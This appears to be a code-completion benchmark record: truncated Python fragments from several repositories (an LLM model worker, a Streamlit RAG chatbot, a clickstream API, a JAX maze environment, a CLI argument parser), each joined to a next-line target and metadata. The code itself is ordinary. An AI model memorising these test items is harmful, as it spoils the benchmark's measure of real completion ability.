"worker_name": self.worker_addr,
"check_heart_beat": True,
"worker_status": self.get_status(),
}
r = requests.post(url, json=data)
assert r.status_code == 200
def send_heart_beat(self):
logger.info(
f"Send heart beat. Models: {self.model_names}. "
f"Semaphore: {pretty_print_semaphore(self.semaphore)}. "
f"call_ct: {self.call_ct}. "
f"worker_id: {self.worker_id}. "
)
url = self.controller_addr + "/receive_heart_beat"
while True:
try:
ret = requests.post(
url,
json={
"worker_name": self.worker_addr,
"queue_length": self.get_queue_length(),
},
timeout=5,
)
exist = ret.json()["exist"]
break
except requests.exceptions.RequestException as e:
logger.error(f"heart beat error: {e}")
time.sleep(5)
if not exist:
self.register_to_controller()
def get_queue_length(self):
if (
self.semaphore is None
or self.semaphore._value is None
or self.semaphore._waiters is None
):
return 0
else:
return (
self.limit_worker_concurrency
- self.semaphore._value
+ len(self.semaphore._waiters)
)
def get_status(self):
return {
"model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
def count_token(self, params):
prompt = params["prompt"]
input_ids = self.tokenizer(prompt).input_ids
input_echo_len = len(input_ids)
ret = {
"count": input_echo_len,
"error_code": 0,
}
return ret
def get_conv_template(self):
return {"conv": self.conv}
class ModelWorker(BaseModelWorker):
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
no_register: bool,
device: str,
num_gpus: int,
max_gpu_memory: str,
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: bool = None,
stream_interval: int = 2,
conv_template: str = None,
):
super().__init__(
controller_addr,
worker_addr,
worker_id,
model_path,
model_names,
limit_worker_concurrency,
conv_template=conv_template,
)
logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...")
| """
A model worker that executes the model.
"""
try:
except ImportError:
worker_id = str(uuid.uuid4())[:8]
logger = build_logger("model_worker", f"gradio_output/model_worker_{worker_id}.log")
app = FastAPI()
def heart_beat_worker(obj):
while True:
time.sleep(WORKER_HEART_BEAT_INTERVAL)
obj.send_heart_beat()
class BaseModelWorker:
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
conv_template: str = None,
):
self.controller_addr = controller_addr
self.worker_addr = worker_addr
self.worker_id = worker_id
if model_path.endswith("/"):
model_path = model_path[:-1]
self.model_names = model_names or [model_path.split("/")[-1]]
self.limit_worker_concurrency = limit_worker_concurrency
if conv_template:
self.conv = get_conv_template(conv_template)
else:
self.conv = get_conversation_template(model_path)
self.conv.sep_style = int(self.conv.sep_style)
self.tokenizer = None
self.context_len = None
self.call_ct = 0
self.semaphore = None
self.heart_beat_thread = None
def init_heart_beat(self):
self.register_to_controller()
self.heart_beat_thread = threading.Thread(
target=heart_beat_worker, args=(self,)
)
self.heart_beat_thread.start()
def register_to_controller(self):
logger.info("Register to controller")
url = self.controller_addr + "/register_worker"
data = {
"worker_name": self.worker_addr,
"check_heart_beat": True,
"worker_status": self.get_status(),
}
r = requests.post(url, json=data)
assert r.status_code == 200
def send_heart_beat(self):
logger.info(
f"Send heart beat. Models: {self.model_names}. "
f"Semaphore: {pretty_print_semaphore(self.semaphore)}. "
f"call_ct: {self.call_ct}. "
f"worker_id: {self.worker_id}. "
)
url = self.controller_addr + "/receive_heart_beat"
while True:
try:
ret = requests.post(
url,
json={
"worker_name": self.worker_addr,
"queue_length": self.get_queue_length(),
},
timeout=5,
)
exist = ret.json()["exist"]
break
except requests.exceptions.RequestException as e:
logger.error(f"heart beat error: {e}")
time.sleep(5)
if not exist:
self.register_to_controller()
def get_queue_length(self):
if (
self.semaphore is None
or self.semaphore._value is None
or self.semaphore._waiters is None
):
return 0
else:
return (
self.limit_worker_concurrency
- self.semaphore._value
+ len(self.semaphore._waiters)
)
def get_status(self):
return {
"model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
def count_token(self, params):
prompt = params["prompt"]
input_ids = self.tokenizer(prompt).input_ids
input_echo_len = len(input_ids)
ret = {
"count": input_echo_len,
"error_code": 0,
}
return ret
def get_conv_template(self):
return {"conv": self.conv}
class ModelWorker(BaseModelWorker):
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
no_register: bool,
device: str,
num_gpus: int,
max_gpu_memory: str,
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: bool = None,
stream_interval: int = 2,
conv_template: str = None,
):
super().__init__(
controller_addr,
worker_addr,
worker_id,
model_path,
model_names,
limit_worker_concurrency,
conv_template=conv_template,
)
logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...") | self.model, self.tokenizer = load_model( | 4 | 2023-10-26 19:41:07+00:00 | 4k |
cncf/llm-starter-pack | bot.py | [
{
"identifier": "create_vector_index",
"path": "utils.py",
"snippet": "def create_vector_index(driver, dimension: int) -> None:\n index_query = \"CALL db.index.vector.createNodeIndex('stackoverflow', 'Question', 'embedding', $dimension, 'cosine')\"\n try:\n driver.query(index_query, {\"dime... | import os
import streamlit as st
from streamlit.logger import get_logger
from langchain.callbacks.base import BaseCallbackHandler
from langchain.graphs import Neo4jGraph
from dotenv import load_dotenv
from utils import (
create_vector_index,
)
from chains import (
load_embedding_model,
load_llm,
configure_llm_only_chain,
configure_qa_rag_chain,
generate_ticket,
) | 3,097 | self.text = initial_text
def on_llm_new_token(self, token: str, **kwargs) -> None:
self.text += token
self.container.markdown(self.text)
llm = load_llm(llm_name, logger=logger, config={"ollama_base_url": ollama_base_url})
llm_chain = configure_llm_only_chain(llm)
rag_chain = configure_qa_rag_chain(
llm, embeddings, embeddings_store_url=url, username=username, password=password
)
# Streamlit UI
styl = f"""
<style>
/* not great support for :has yet (hello FireFox), but using it for now */
.main {{
background-image: url('https://vior-lys.s3.amazonaws.com/img/kccnna23.png');
background-repeat: repeat;
background-size: cover;
background-attachment: fixed;
}}
.element-container:has([aria-label="Select RAG mode"]) {{
position: fixed;
bottom: 33px;
z-index: 101;
}}
.stChatFloatingInputContainer {{
bottom: 20px;
background: transparent;
}}
/* Generate ticket text area */
textarea[aria-label="Description"] {{
height: 200px;
}}
</style>
"""
st.markdown(styl, unsafe_allow_html=True)
def chat_input():
user_input = st.chat_input("What does the KubeCon + CloudNativeCon audience want to know today?")
if user_input:
with st.chat_message("user"):
st.write(user_input)
with st.chat_message("assistant"):
st.caption(f"RAG: {name}")
stream_handler = StreamHandler(st.empty())
result = output_function(
{"question": user_input, "chat_history": []}, callbacks=[stream_handler]
)["answer"]
output = result
st.session_state[f"user_input"].append(user_input)
st.session_state[f"generated"].append(output)
st.session_state[f"rag_mode"].append(name)
def display_chat():
# Session state
if "generated" not in st.session_state:
st.session_state[f"generated"] = []
if "user_input" not in st.session_state:
st.session_state[f"user_input"] = []
if "rag_mode" not in st.session_state:
st.session_state[f"rag_mode"] = []
if st.session_state[f"generated"]:
size = len(st.session_state[f"generated"])
# Display only the last three exchanges
for i in range(max(size - 3, 0), size):
with st.chat_message("user"):
st.write(st.session_state[f"user_input"][i])
with st.chat_message("assistant"):
st.caption(f"RAG: {st.session_state[f'rag_mode'][i]}")
st.write(st.session_state[f"generated"][i])
with st.expander("Not finding what you're looking for?"):
st.write(
"Automatically generate a draft for an internal ticket to our support team."
)
st.button(
"Generate ticket",
type="primary",
key="show_ticket",
on_click=open_sidebar,
)
with st.container():
st.write(" ")
def mode_select() -> str:
options = ["Disabled", "Enabled"]
return st.radio("Select RAG mode", options, horizontal=True)
name = mode_select()
if name == "LLM only" or name == "Disabled":
output_function = llm_chain
elif name == "Vector + Graph" or name == "Enabled":
output_function = rag_chain
def open_sidebar():
st.session_state.open_sidebar = True
def close_sidebar():
st.session_state.open_sidebar = False
if not "open_sidebar" in st.session_state:
st.session_state.open_sidebar = False
if st.session_state.open_sidebar:
|
load_dotenv(".env")
url = os.getenv("NEO4J_URI")
username = os.getenv("NEO4J_USERNAME")
password = os.getenv("NEO4J_PASSWORD")
ollama_base_url = os.getenv("OLLAMA_BASE_URL")
embedding_model_name = os.getenv("EMBEDDING_MODEL")
llm_name = os.getenv("LLM")
# Remapping for Langchain Neo4j integration
os.environ["NEO4J_URL"] = url
logger = get_logger(__name__)
# if Neo4j is local, you can go to http://localhost:7474/ to browse the database
neo4j_graph = Neo4jGraph(url=url, username=username, password=password)
embeddings, dimension = load_embedding_model(
embedding_model_name, config={"ollama_base_url": ollama_base_url}, logger=logger
)
create_vector_index(neo4j_graph, dimension)
class StreamHandler(BaseCallbackHandler):
def __init__(self, container, initial_text=""):
self.container = container
self.text = initial_text
def on_llm_new_token(self, token: str, **kwargs) -> None:
self.text += token
self.container.markdown(self.text)
llm = load_llm(llm_name, logger=logger, config={"ollama_base_url": ollama_base_url})
llm_chain = configure_llm_only_chain(llm)
rag_chain = configure_qa_rag_chain(
llm, embeddings, embeddings_store_url=url, username=username, password=password
)
# Streamlit UI
styl = f"""
<style>
/* not great support for :has yet (hello FireFox), but using it for now */
.main {{
background-image: url('https://vior-lys.s3.amazonaws.com/img/kccnna23.png');
background-repeat: repeat;
background-size: cover;
background-attachment: fixed;
}}
.element-container:has([aria-label="Select RAG mode"]) {{
position: fixed;
bottom: 33px;
z-index: 101;
}}
.stChatFloatingInputContainer {{
bottom: 20px;
background: transparent;
}}
/* Generate ticket text area */
textarea[aria-label="Description"] {{
height: 200px;
}}
</style>
"""
st.markdown(styl, unsafe_allow_html=True)
def chat_input():
user_input = st.chat_input("What does the KubeCon + CloudNativeCon audience want to know today?")
if user_input:
with st.chat_message("user"):
st.write(user_input)
with st.chat_message("assistant"):
st.caption(f"RAG: {name}")
stream_handler = StreamHandler(st.empty())
result = output_function(
{"question": user_input, "chat_history": []}, callbacks=[stream_handler]
)["answer"]
output = result
st.session_state[f"user_input"].append(user_input)
st.session_state[f"generated"].append(output)
st.session_state[f"rag_mode"].append(name)
def display_chat():
# Session state
if "generated" not in st.session_state:
st.session_state[f"generated"] = []
if "user_input" not in st.session_state:
st.session_state[f"user_input"] = []
if "rag_mode" not in st.session_state:
st.session_state[f"rag_mode"] = []
if st.session_state[f"generated"]:
size = len(st.session_state[f"generated"])
# Display only the last three exchanges
for i in range(max(size - 3, 0), size):
with st.chat_message("user"):
st.write(st.session_state[f"user_input"][i])
with st.chat_message("assistant"):
st.caption(f"RAG: {st.session_state[f'rag_mode'][i]}")
st.write(st.session_state[f"generated"][i])
with st.expander("Not finding what you're looking for?"):
st.write(
"Automatically generate a draft for an internal ticket to our support team."
)
st.button(
"Generate ticket",
type="primary",
key="show_ticket",
on_click=open_sidebar,
)
with st.container():
st.write(" ")
def mode_select() -> str:
options = ["Disabled", "Enabled"]
return st.radio("Select RAG mode", options, horizontal=True)
name = mode_select()
if name == "LLM only" or name == "Disabled":
output_function = llm_chain
elif name == "Vector + Graph" or name == "Enabled":
output_function = rag_chain
def open_sidebar():
st.session_state.open_sidebar = True
def close_sidebar():
st.session_state.open_sidebar = False
if not "open_sidebar" in st.session_state:
st.session_state.open_sidebar = False
if st.session_state.open_sidebar: | new_title, new_question = generate_ticket( | 5 | 2023-10-30 22:07:50+00:00 | 4k |
EulerSearch/embedding_studio | embedding_studio/api/api_v1/endpoints/clickstream_client.py | [
{
"identifier": "SessionAddEventsRequest",
"path": "embedding_studio/api/api_v1/schemas/clickstream_client.py",
"snippet": "class SessionAddEventsRequest(BaseModel):\n session_id: str\n events: List[NewSessionEvent]"
},
{
"identifier": "SessionCreateRequest",
"path": "embedding_studio/... | import logging
from typing import Optional
from fastapi import APIRouter, HTTPException, status
from embedding_studio.api.api_v1.schemas.clickstream_client import (
SessionAddEventsRequest,
SessionCreateRequest,
SessionGetResponse,
SessionMarkIrrelevantRequest,
)
from embedding_studio.context.app_context import context
from embedding_studio.core.config import settings
from embedding_studio.models.clickstream.session_events import SessionEvent
from embedding_studio.models.clickstream.sessions import (
Session,
SessionWithEvents,
)
from embedding_studio.utils import datetime_utils | 2,900 |
logger = logging.getLogger(__name__)
router = APIRouter()
@router.post(
"/session",
status_code=status.HTTP_200_OK,
)
def create_session(
body: SessionCreateRequest,
) -> None:
logger.debug(f"Register session: {body}")
body.created_at = _ensure_timestamp(body.created_at)
|
logger = logging.getLogger(__name__)
router = APIRouter()
@router.post(
"/session",
status_code=status.HTTP_200_OK,
)
def create_session(
body: SessionCreateRequest,
) -> None:
logger.debug(f"Register session: {body}")
body.created_at = _ensure_timestamp(body.created_at) | session = Session.model_validate(body.model_dump()) | 7 | 2023-10-31 00:33:13+00:00 | 4k |
facebookresearch/minimax | src/minimax/envs/maze/maze_ued.py | [
{
"identifier": "EnvInstance",
"path": "src/minimax/envs/maze/common.py",
"snippet": "class EnvInstance:\n\tagent_pos: chex.Array\n\tagent_dir_idx: int\n\tgoal_pos: chex.Array\n\twall_map: chex.Array"
},
{
"identifier": "make_maze_map",
"path": "src/minimax/envs/maze/common.py",
"snippet... | from dataclasses import dataclass
from collections import namedtuple, OrderedDict
from functools import partial
from enum import IntEnum
from jax import lax
from typing import Tuple, Optional
from flax import struct
from flax.core.frozen_dict import FrozenDict
from .common import EnvInstance, make_maze_map
from minimax.envs import environment, spaces
from minimax.envs.registration import register_ued
import numpy as np
import jax
import jax.numpy as jnp
import chex | 3,210 | encoding_pos = state.encoding[1:params.n_walls+3]
last_wall_step_idx = max_n_walls
pos_dist = jnp.ones(self.n_tiles).at[
jnp.flip(encoding_pos)].set(jnp.flip(dist_values))
all_pos = jnp.arange(self.n_tiles, dtype=jnp.uint32)
# Only mark collision if replace_wall_pos=False OR the agent is placed over the goal
goal_step_idx = last_wall_step_idx + 1
agent_step_idx = last_wall_step_idx + 2
# Track whether it is the last time step
next_state = state.replace(time=state.time + 1)
done = self.is_terminal(next_state)
# Always place agent idx in last enc position.
is_agent_dir_step = jnp.logical_and(
params.set_agent_dir,
done
)
collision = jnp.logical_and(
pos_dist[action] < 1,
jnp.logical_or(
not params.replace_wall_pos,
jnp.logical_and( # agent pos cannot override goal
jnp.equal(state.time, agent_step_idx),
jnp.equal(state.encoding[goal_step_idx], action)
)
)
)
collision = (collision * (1-is_agent_dir_step)).astype(jnp.uint32)
action = (1-collision)*action + \
collision*jax.random.choice(collision_rng, all_pos, replace=False, p=pos_dist)
enc_idx = (1-is_agent_dir_step)*state.time + is_agent_dir_step*(-1)
encoding = state.encoding.at[enc_idx].set(action)
next_state = next_state.replace(
encoding=encoding,
terminal=done
)
reward = 0
obs = self._add_noise_to_obs(noise_rng, self.get_obs(next_state))
return (
lax.stop_gradient(obs),
lax.stop_gradient(next_state),
reward,
done,
{},
)
def get_env_instance(
self,
key: chex.PRNGKey,
state: EnvState
) -> chex.Array:
"""
Converts internal encoding to an instance encoding that
can be interpreted by the `set_to_instance` method
the paired Environment class.
"""
params = self.params
h = params.height
w = params.width
enc = state.encoding
# === Extract agent_dir, agent_pos, and goal_pos ===
# Num walls placed currently
if params.fixed_n_wall_steps:
n_walls = params.n_walls
enc_len = self._get_encoding_dim()
wall_pos_idx = jnp.flip(enc[:params.n_walls])
agent_pos_idx = enc_len-2 # Enc is full length
goal_pos_idx = enc_len-3
else:
n_walls = jnp.round(
params.n_walls*enc[0]/self.n_tiles
).astype(jnp.uint32)
if params.first_wall_pos_sets_budget:
wall_pos_idx = jnp.flip(enc[:params.n_walls]) # So 0-padding does not override pos=0
enc_len = n_walls + 2 # [wall_pos] + len((goal, agent))
else:
wall_pos_idx = jnp.flip(enc[1:params.n_walls+1])
enc_len = n_walls + 3 # [wall_pos] + len((n_walls, goal, agent))
agent_pos_idx = enc_len-1 # Positions are relative to n_walls when n_walls is variable.
goal_pos_idx = enc_len-2
# Get agent + goal info (set agent/goal pos 1-step out of range if they are not yet placed)
goal_placed = state.time > jnp.array([goal_pos_idx], dtype=jnp.uint32)
goal_pos = \
goal_placed*jnp.array([enc[goal_pos_idx]%w, enc[goal_pos_idx]//w], dtype=jnp.uint32) \
+ (~goal_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_placed = state.time > jnp.array([agent_pos_idx], dtype=jnp.uint32)
agent_pos = \
agent_placed*jnp.array([enc[agent_pos_idx]%w, enc[agent_pos_idx]//w], dtype=jnp.uint32) \
+ (~agent_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_dir_idx = jnp.floor((4*enc[-1]/self.n_tiles)).astype(jnp.uint8)
# Make wall map
wall_start_time = jnp.logical_and( # 1 if explicitly predict # blocks, else 0
not params.fixed_n_wall_steps,
not params.first_wall_pos_sets_budget
).astype(jnp.uint32)
wall_map = jnp.zeros(h*w, dtype=jnp.bool_)
wall_values = jnp.arange(params.n_walls) + wall_start_time < jnp.minimum(state.time, n_walls + wall_start_time)
wall_values = jnp.flip(wall_values)
wall_map = wall_map.at[wall_pos_idx].set(wall_values)
# Zero out walls where agent and goal reside
agent_mask = agent_placed*(~(jnp.arange(h*w) == state.encoding[agent_pos_idx])) + ~agent_placed*wall_map
goal_mask = goal_placed*(~(jnp.arange(h*w) == state.encoding[goal_pos_idx])) + ~goal_placed*wall_map
wall_map = wall_map*agent_mask*goal_mask
wall_map = wall_map.reshape(h,w)
| """
Copyright (c) Meta Platforms, Inc. and affiliates.
All rights reserved.
This source code is licensed under the license found in the
LICENSE file in the root directory of this source tree.
"""
class SequentialActions(IntEnum):
skip = 0
wall = 1
goal = 2
agent = 3
@struct.dataclass
class EnvState:
encoding: chex.Array
time: int
terminal: bool
@struct.dataclass
class EnvParams:
height: int = 15
width: int = 15
n_walls: int = 25
noise_dim: int = 50
replace_wall_pos: bool = False
fixed_n_wall_steps: bool = False
first_wall_pos_sets_budget: bool = False
use_seq_actions: bool = False,
set_agent_dir: bool = False
normalize_obs: bool = False
singleton_seed: int = -1
class UEDMaze(environment.Environment):
def __init__(
self,
height=13,
width=13,
n_walls=25,
noise_dim=16,
replace_wall_pos=False,
fixed_n_wall_steps=False,
first_wall_pos_sets_budget=False,
use_seq_actions=False,
set_agent_dir=False,
normalize_obs=False,
):
"""
Using the original action space requires ensuring proper handling
of a sequence with trailing dones, e.g. dones: 0 0 0 0 1 1 1 1 1 ... 1.
Advantages and value losses should only be computed where ~dones[0].
"""
assert not (first_wall_pos_sets_budget and fixed_n_wall_steps), \
'Setting first_wall_pos_sets_budget=True requires fixed_n_wall_steps=False.'
super().__init__()
self.n_tiles = height*width
self.action_set = jnp.array(jnp.arange(self.n_tiles)) # go straight, turn left, turn right, take action
self.params = EnvParams(
height=height,
width=width,
n_walls=n_walls,
noise_dim=noise_dim,
replace_wall_pos=replace_wall_pos,
fixed_n_wall_steps=fixed_n_wall_steps,
first_wall_pos_sets_budget=first_wall_pos_sets_budget,
use_seq_actions=False,
set_agent_dir=set_agent_dir,
normalize_obs=normalize_obs,
)
@staticmethod
def align_kwargs(kwargs, other_kwargs):
kwargs.update(dict(
height=other_kwargs['height'],
width=other_kwargs['width'],
))
return kwargs
def _add_noise_to_obs(self, rng, obs):
if self.params.noise_dim > 0:
noise = jax.random.uniform(rng, (self.params.noise_dim,))
obs.update(dict(noise=noise))
return obs
def reset_env(
self,
key: chex.PRNGKey):
"""
Prepares the environment state for a new design
from a blank slate.
"""
params = self.params
noise_rng, dir_rng = jax.random.split(key)
encoding = jnp.zeros((self._get_encoding_dim(),), dtype=jnp.uint32)
if not params.set_agent_dir:
rand_dir = jax.random.randint(dir_rng, (), minval=0, maxval=4) # deterministic
tile_scale_dir = jnp.ceil((rand_dir/4)*self.n_tiles).astype(jnp.uint32)
encoding = encoding.at[-1].set(tile_scale_dir)
state = EnvState(
encoding=encoding,
time=0,
terminal=False,
)
obs = self._add_noise_to_obs(
noise_rng,
self.get_obs(state)
)
return obs, state
def step_env(
self,
key: chex.PRNGKey,
state: EnvState,
action: int,
) -> Tuple[chex.Array, EnvState, float, bool, dict]:
"""
Take a design step.
action: A pos as an int from 0 to (height*width)-1
"""
params = self.params
collision_rng, noise_rng = jax.random.split(key)
# Sample a random free tile in case of a collision
dist_values = jnp.logical_and( # True if position taken
jnp.ones(params.n_walls + 2),
jnp.arange(params.n_walls + 2)+1 > state.time
)
# Get zero-indexed last wall time step
if params.fixed_n_wall_steps:
max_n_walls = params.n_walls
encoding_pos = state.encoding[:params.n_walls+2]
last_wall_step_idx = max_n_walls - 1
else:
max_n_walls = jnp.round(
params.n_walls*state.encoding[0]/self.n_tiles).astype(jnp.uint32)
if self.params.first_wall_pos_sets_budget:
encoding_pos = state.encoding[:params.n_walls+2]
last_wall_step_idx = jnp.maximum(max_n_walls,1) - 1
else:
encoding_pos = state.encoding[1:params.n_walls+3]
last_wall_step_idx = max_n_walls
pos_dist = jnp.ones(self.n_tiles).at[
jnp.flip(encoding_pos)].set(jnp.flip(dist_values))
all_pos = jnp.arange(self.n_tiles, dtype=jnp.uint32)
# Only mark collision if replace_wall_pos=False OR the agent is placed over the goal
goal_step_idx = last_wall_step_idx + 1
agent_step_idx = last_wall_step_idx + 2
# Track whether it is the last time step
next_state = state.replace(time=state.time + 1)
done = self.is_terminal(next_state)
# Always place agent idx in last enc position.
is_agent_dir_step = jnp.logical_and(
params.set_agent_dir,
done
)
collision = jnp.logical_and(
pos_dist[action] < 1,
jnp.logical_or(
not params.replace_wall_pos,
jnp.logical_and( # agent pos cannot override goal
jnp.equal(state.time, agent_step_idx),
jnp.equal(state.encoding[goal_step_idx], action)
)
)
)
collision = (collision * (1-is_agent_dir_step)).astype(jnp.uint32)
action = (1-collision)*action + \
collision*jax.random.choice(collision_rng, all_pos, replace=False, p=pos_dist)
enc_idx = (1-is_agent_dir_step)*state.time + is_agent_dir_step*(-1)
encoding = state.encoding.at[enc_idx].set(action)
next_state = next_state.replace(
encoding=encoding,
terminal=done
)
reward = 0
obs = self._add_noise_to_obs(noise_rng, self.get_obs(next_state))
return (
lax.stop_gradient(obs),
lax.stop_gradient(next_state),
reward,
done,
{},
)
def get_env_instance(
self,
key: chex.PRNGKey,
state: EnvState
) -> chex.Array:
"""
Converts internal encoding to an instance encoding that
can be interpreted by the `set_to_instance` method
the paired Environment class.
"""
params = self.params
h = params.height
w = params.width
enc = state.encoding
# === Extract agent_dir, agent_pos, and goal_pos ===
# Num walls placed currently
if params.fixed_n_wall_steps:
n_walls = params.n_walls
enc_len = self._get_encoding_dim()
wall_pos_idx = jnp.flip(enc[:params.n_walls])
agent_pos_idx = enc_len-2 # Enc is full length
goal_pos_idx = enc_len-3
else:
n_walls = jnp.round(
params.n_walls*enc[0]/self.n_tiles
).astype(jnp.uint32)
if params.first_wall_pos_sets_budget:
wall_pos_idx = jnp.flip(enc[:params.n_walls]) # So 0-padding does not override pos=0
enc_len = n_walls + 2 # [wall_pos] + len((goal, agent))
else:
wall_pos_idx = jnp.flip(enc[1:params.n_walls+1])
enc_len = n_walls + 3 # [wall_pos] + len((n_walls, goal, agent))
agent_pos_idx = enc_len-1 # Positions are relative to n_walls when n_walls is variable.
goal_pos_idx = enc_len-2
# Get agent + goal info (set agent/goal pos 1-step out of range if they are not yet placed)
goal_placed = state.time > jnp.array([goal_pos_idx], dtype=jnp.uint32)
goal_pos = \
goal_placed*jnp.array([enc[goal_pos_idx]%w, enc[goal_pos_idx]//w], dtype=jnp.uint32) \
+ (~goal_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_placed = state.time > jnp.array([agent_pos_idx], dtype=jnp.uint32)
agent_pos = \
agent_placed*jnp.array([enc[agent_pos_idx]%w, enc[agent_pos_idx]//w], dtype=jnp.uint32) \
+ (~agent_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_dir_idx = jnp.floor((4*enc[-1]/self.n_tiles)).astype(jnp.uint8)
# Make wall map
wall_start_time = jnp.logical_and( # 1 if explicitly predict # blocks, else 0
not params.fixed_n_wall_steps,
not params.first_wall_pos_sets_budget
).astype(jnp.uint32)
wall_map = jnp.zeros(h*w, dtype=jnp.bool_)
wall_values = jnp.arange(params.n_walls) + wall_start_time < jnp.minimum(state.time, n_walls + wall_start_time)
wall_values = jnp.flip(wall_values)
wall_map = wall_map.at[wall_pos_idx].set(wall_values)
# Zero out walls where agent and goal reside
agent_mask = agent_placed*(~(jnp.arange(h*w) == state.encoding[agent_pos_idx])) + ~agent_placed*wall_map
goal_mask = goal_placed*(~(jnp.arange(h*w) == state.encoding[goal_pos_idx])) + ~goal_placed*wall_map
wall_map = wall_map*agent_mask*goal_mask
wall_map = wall_map.reshape(h,w)
| return EnvInstance( | 0 | 2023-10-28 12:12:01+00:00 | 4k |
reworkd/bananalyzer | bananalyzer/__main__.py | [
{
"identifier": "AgentRunner",
"path": "bananalyzer/runner/agent_runner.py",
"snippet": "class AgentRunner(ABC):\n \"\"\"\n Wrapper class clients must implement to run an agent against the evaluations\n \"\"\"\n\n @abstractmethod\n async def run(\n self,\n page: Page,\n ... | import argparse
import ast
import importlib.util
import sys
from pathlib import Path
from typing import List
from urllib.parse import urlparse
from bananalyzer import AgentRunner
from bananalyzer.data.examples import (
get_test_examples,
get_training_examples,
download_examples,
)
from bananalyzer.runner.generator import PytestTestGenerator
from bananalyzer.runner.runner import run_tests
from bananalyzer.schema import AgentRunnerClass, Args, PytestArgs, XDistArgs | 3,082 | "--id",
type=str,
default=None,
help="Filter tests by id. "
"Ids could be of shape a4c8292a_079c_4e49_bca1_cf7c9da205ec or a4c8292a-079c-4e49-bca1-cf7c9da205ec",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default=None,
help="Filter tests by a particular URL domain",
)
parser.add_argument(
"-i",
"--intent",
type=str,
default=None,
help="Filter tests by a particular intent",
)
parser.add_argument(
"-c",
"--category",
type=str,
default=None,
help="Filter tests by a particular category",
)
parser.add_argument(
"--subcategory",
type=str,
default=None,
help="Filter tests by a particular subcategory",
)
parser.add_argument(
"-n",
"--n",
type=str,
default="logical",
help="Number of test workers to use. The default is 1",
)
parser.add_argument(
"-skip",
"--skip",
type=lambda s: s.split(","),
default=[],
help="A list of ids to skip tests on, separated by commas",
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="Will decrease the verbosity of pytest. By default we run with the `--v` pytest param.",
)
parser.add_argument(
"--single_browser_instance",
action="store_true",
help="Run tests in a single browser instance as opposed to creating a browser "
"instance per test. This is faster but less reliable as test contexts can "
"occasionally bleed into each other, causing tests to fail",
)
parser.add_argument(
"--type",
type=str,
default=None,
help="Filter tests by a particular type",
)
parser.add_argument(
"--download",
action="store_true",
help="Will re-download training and test examples",
)
parser.add_argument(
"--test",
action="store_true",
help="Use test set examples instead of training set examples",
)
parser.add_argument(
"--count",
type=int,
default=None,
help="The number of times to run an individual test. Won't work for detail pages",
)
parser.add_argument(
"--junitxml",
type=str,
default=None,
help="The path for the junitxml report file",
)
parser.add_argument(
"--dist",
type=str,
default="loadscope",
help="The distribution mode for pytest-xdist",
)
args = parser.parse_args()
if args.download and not args.path:
args.path = "DOWNLOAD_ONLY"
if not args.path:
print(
f"Please provide the path to a {file_name} file. "
f"Use the --help flag for more information."
)
exit(1)
return Args(
path=args.path,
headless=args.headless,
intent=args.intent,
id=args.id,
domain=args.domain,
category=args.category,
subcategory=args.subcategory,
skip=args.skip,
single_browser_instance=args.single_browser_instance,
type=args.type,
test=args.test,
download=args.download,
count=args.count,
| # Separate banana-lyzer args from pytest args
# Look for an instance of Banana-lyzer in the current directory
# If it doesn't exist, error
def print_intro() -> None:
# https://www.asciiart.eu/food-and-drinks/bananas
print(
r"""
//\
V \
\ \_
\,'.`-.
|\ `. `.
( \ `. `-. _,.-:\
\ \ `. `-._ __..--' ,-';/
\ `. `-. `-..___..---' _.--' ,'/
`. `. `-._ __..--' ,' /
`. `-_ ``--..'' _.-' ,'
`-_ `-.___ __,--' ,'
`-.__ `----''' __.-'
`--..____..--'
"""
)
print("Bananalyzing... 🍌")
def parse_args() -> Args:
file_name = "bananalyzer-agent.py"
parser = argparse.ArgumentParser(
description="Run the agent inside a bananalyzer agent definition file "
"against the benchmark",
)
parser.add_argument(
"path", type=str, nargs="?", default=None, help=f"Path to the {file_name} file"
)
parser.add_argument(
"--headless", action="store_true", help="Whether to run headless or not"
)
parser.add_argument(
"-s",
"--s",
action="store_true",
help="Shortcut for --capture=no in pytest. Will print stdout and stderr",
)
parser.add_argument(
"-id",
"--id",
type=str,
default=None,
help="Filter tests by id. "
"Ids could be of shape a4c8292a_079c_4e49_bca1_cf7c9da205ec or a4c8292a-079c-4e49-bca1-cf7c9da205ec",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default=None,
help="Filter tests by a particular URL domain",
)
parser.add_argument(
"-i",
"--intent",
type=str,
default=None,
help="Filter tests by a particular intent",
)
parser.add_argument(
"-c",
"--category",
type=str,
default=None,
help="Filter tests by a particular category",
)
parser.add_argument(
"--subcategory",
type=str,
default=None,
help="Filter tests by a particular subcategory",
)
parser.add_argument(
"-n",
"--n",
type=str,
default="logical",
help="Number of test workers to use. The default is 1",
)
parser.add_argument(
"-skip",
"--skip",
type=lambda s: s.split(","),
default=[],
help="A list of ids to skip tests on, separated by commas",
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="Will decrease the verbosity of pytest. By default we run with the `--v` pytest param.",
)
parser.add_argument(
"--single_browser_instance",
action="store_true",
help="Run tests in a single browser instance as opposed to creating a browser "
"instance per test. This is faster but less reliable as test contexts can "
"occasionally bleed into each other, causing tests to fail",
)
parser.add_argument(
"--type",
type=str,
default=None,
help="Filter tests by a particular type",
)
parser.add_argument(
"--download",
action="store_true",
help="Will re-download training and test examples",
)
parser.add_argument(
"--test",
action="store_true",
help="Use test set examples instead of training set examples",
)
parser.add_argument(
"--count",
type=int,
default=None,
help="The number of times to run an individual test. Won't work for detail pages",
)
parser.add_argument(
"--junitxml",
type=str,
default=None,
help="The path for the junitxml report file",
)
parser.add_argument(
